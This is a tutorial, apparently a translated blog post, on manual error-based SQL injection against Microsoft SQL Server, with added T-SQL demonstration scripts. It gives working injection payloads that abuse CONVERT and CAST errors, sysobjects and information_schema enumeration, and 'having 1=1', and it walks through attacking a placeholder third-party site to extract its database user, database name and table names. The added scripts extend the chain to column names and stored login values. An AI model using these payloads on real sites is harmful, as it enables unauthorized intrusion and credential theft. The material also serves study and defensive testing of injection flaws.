By Ay shadow
When it comes to manual MSSQL injection, I prefer error-based injection. Why? Because you only need to construct one statement and the application itself tells you what you want to know; you do not have to guess it one character at a time, so it saves time and effort. With blind injection, where nothing is echoed back, you can spend half a day guessing. Let me start with how I understand the principle behind error-based injection.
Verbose error messages were originally meant to help programmers fix their code. We simply turn them to our own use: we deliberately make the query fail so that the error exposes the sensitive information we are after.
Last time I covered having 1=1 and group by, which trigger errors through invalid syntax. This time the topic is data type conversion errors: we force an error by converting a value into a type it does not fit.
Everyone has heard of data types such as int and char. When we define a piece of data we also define its length; an int, for example, is four bytes long. If a value does not fit into four bytes it overflows and precision would be lost, so the database engine reports an error instead of silently storing a wrong value.
Conversion follows a rule: a short type can be converted to a longer one, but a long type cannot be converted to a shorter one if the value does not fit. What does that mean? The database has the integer types tinyint (one byte), smallint (two bytes) and int (four bytes). A tinyint can be converted up to smallint or int without error, but converting back down to smallint or tinyint overflows when the value is too large. Why? It is easy to see: a value that needs four bytes cannot be squeezed into two bytes, so data would be lost; the reverse, moving two bytes of data into a four-byte space, loses nothing and raises no error. The same idea applies to character data: a string can only become an int if it happens to be a number, and when the conversion fails SQL Server's error message quotes the value it could not convert. That quoted value is exactly what we exploit.
To apply this method I use the following two conversion functions:
Data conversion functions
CONVERT(data_type, expression)   -- expression is the value to be converted
CAST(expression AS data_type)
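As an added example (not from the original article), the following T-SQL statements show the conversion rules described above on SQL Server itself: widening succeeds, narrowing a value that does not fit raises an arithmetic overflow error that names the value (on SQL Server 2005 and later the text reads "Arithmetic overflow error for data type tinyint, value = 300."), and converting a non-numeric string to int raises a conversion error that quotes the string ("Conversion failed when converting the nvarchar value 'FM_admin' to data type int."; older versions word it differently but still quote the value). The last two statements show the comparison form used in injection payloads.

```sql
-- Added example, not part of the original article. Run each batch on its
-- own in SSMS or sqlcmd; the ones marked "fails" raise an error on purpose.

-- Widening (short -> long) always succeeds: nothing is lost.
SELECT CAST(CAST(200 AS tinyint) AS smallint)   AS widened_smallint,
       CONVERT(int, CAST(30000 AS smallint))    AS widened_int;
GO

-- Narrowing (long -> short) fails when the value does not fit in the target
-- type; the arithmetic overflow error names the value that was rejected.
SELECT CONVERT(tinyint, 300);
GO

-- String -> int fails unless the string is purely numeric, and the
-- conversion error quotes the string. Put the string you want to read
-- inside the conversion and the engine repeats it back to you.
SELECT CONVERT(int, N'FM_admin');
GO

-- The comparison form used in payloads. int has higher data-type precedence
-- than nvarchar, so SQL Server converts the string side to int and fails,
-- echoing the current database user name and the database name respectively.
SELECT 1 WHERE USER > 0;
GO
SELECT 1 WHERE DB_NAME() > 0;
GO

-- Edge case: a purely numeric string converts cleanly and leaks nothing,
-- so a table or column whose name is a number must be prefixed with a
-- letter to force the failure.
SELECT CONVERT(int, '2024');          -- succeeds, no error, nothing leaked
GO
SELECT CONVERT(int, 'x' + '2024');    -- fails and echoes the prefixed value
GO
```

USER is the niladic function behind the article's "and user>0" payload; it returns the current database user, not the server login, which is why the practice section below reads the same name from both user and db_name() on a site whose application user is named after its database.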
The statements we need during injection:
having and group by alone cannot complete the detection process; they have to be combined with the system tables and views that list object names, because a table's name must be known before anything in it can be queried.
First method (sysobjects)
select name from sysobjects where xtype = 'U'  -- use this to reveal the first table
select name from sysobjects where xtype = 'U' and name not in ('table 1', 'table 2', ...)
Continue until the table we need appears.
Second method (information_schema.tables)
select table_name from information_schema.tables
select table_name from information_schema.tables where table_name not in ('table 1', 'table 2', ...)
Practice
Target: http://www.xxx.com/shownews.aspx?id=3
First we need an injection point, and we need to determine the database type: MSSQL, Access, or something else.
1. Submit
http://www.xxx.com/shownews.aspx?id=3 and user>0
The conversion error reveals the user name: Jxb_Ojc_Zj_Cn.
2. Submit
http://www.xxx.com/shownews.aspx?id=3 and db_name()>0
The conversion error reveals the database name: Jxb_Ojc_Zj_Cn.
3. Continue by submitting
http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and status>0))
Judging by the name that comes back, this is not the table we want.
4. Submit (the same step is repeated, adding each newly revealed name to the exclusion list, until a table that very likely stores user names appears; the intermediate rounds are omitted here)
http://www.xxx.com/shownews.aspx?id=3 and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and status>0 and name not in ('FM_Page_Class','D99_Tmp','D99_CMD')))
Haha, someone has clearly probed this site before...
5. Having confirmed the table name, we use having 1=1 to expose the columns of the table.
Submit http://www.xxx.com/shownews.aspx?id=3 having 1=1, so that the back end ends up running a statement of the form select * from FM_admin having 1=1. Note that having 1=1 can only report the columns of the table the injected page itself queries; if shownews.aspx does not read from FM_admin, its columns have to be enumerated through the system tables instead, the same way the table name was.
All the column names are exposed. Haha, but normally only one column is exposed per error, so group by is used.
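The following T-SQL script is an added example, not from the original article. It reproduces the whole enumeration chain described under "First method"/"Second method" and in the practice steps above against a throwaway database, so the error messages can be observed safely. The tables news and FM_admin with their columns are constructed for the demo (FM_admin is the name the article finds; the column names are made up). The last two steps go beyond the article, which stops at the table name: they apply the same conversion error to information_schema.columns to read the column names, and then to the table itself to read a value.

```sql
-- Added example, not part of the original article. Run in a scratch database
-- on SQL Server, one batch at a time; every "injected" statement fails on
-- purpose and the error text quotes the value being read.

-- Constructed sample schema standing in for the target site.
CREATE TABLE news     (id int, title nvarchar(100));
CREATE TABLE FM_admin (id int, username nvarchar(50), pwd nvarchar(50));
INSERT INTO news     VALUES (3, N'hello');
INSERT INTO FM_admin VALUES (1, N'admin', N'p@ss');
GO

-- The vulnerable page concatenates the id parameter into a query like the
-- ones below; everything after "id = 3" is the attacker's payload.

-- Step 1: the first user table. xtype = 'U' means user table; status > 0
-- is carried over from the article's payload.
SELECT * FROM news WHERE id = 3
  AND 1 = CONVERT(int, (SELECT TOP 1 name FROM sysobjects
                        WHERE xtype = 'U' AND status > 0));
GO

-- Step 2: exclude every name already seen and repeat; each round reveals
-- exactly one new table name.
SELECT * FROM news WHERE id = 3
  AND 1 = CONVERT(int, (SELECT TOP 1 name FROM sysobjects
                        WHERE xtype = 'U' AND status > 0
                          AND name NOT IN ('news')));
GO

-- The same round through the ANSI view. table_type filters out views, and
-- ORDER BY makes "the next row" deterministic, which a bare TOP 1 does not.
SELECT * FROM news WHERE id = 3
  AND 1 = CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables
                        WHERE table_type = 'BASE TABLE'
                          AND table_name NOT IN ('news')
                        ORDER BY table_name));
GO

-- The article's having 1=1 trick. It names the first column of the table
-- this page queries (news.id here), not of FM_admin, so it only helps when
-- the page itself reads the table of interest.
SELECT * FROM news WHERE id = 3 HAVING 1 = 1;
GO

-- Step 3 (beyond the article): column names of the found table, one per
-- round, by the same conversion error applied to information_schema.columns.
SELECT * FROM news WHERE id = 3
  AND 1 = CONVERT(int, (SELECT TOP 1 column_name FROM information_schema.columns
                        WHERE table_name = 'FM_admin'
                          AND column_name NOT IN ('id')
                        ORDER BY ordinal_position));
GO

-- Step 4 (beyond the article): the stored value itself, one row per round.
SELECT * FROM news WHERE id = 3
  AND 1 = CONVERT(int, (SELECT TOP 1 username FROM FM_admin ORDER BY id));
GO
```

Each failing statement stops its own batch, which is why the steps are separated by GO; in a real attack the same payload is simply appended to the id parameter and the web page's error output plays the role of the query window.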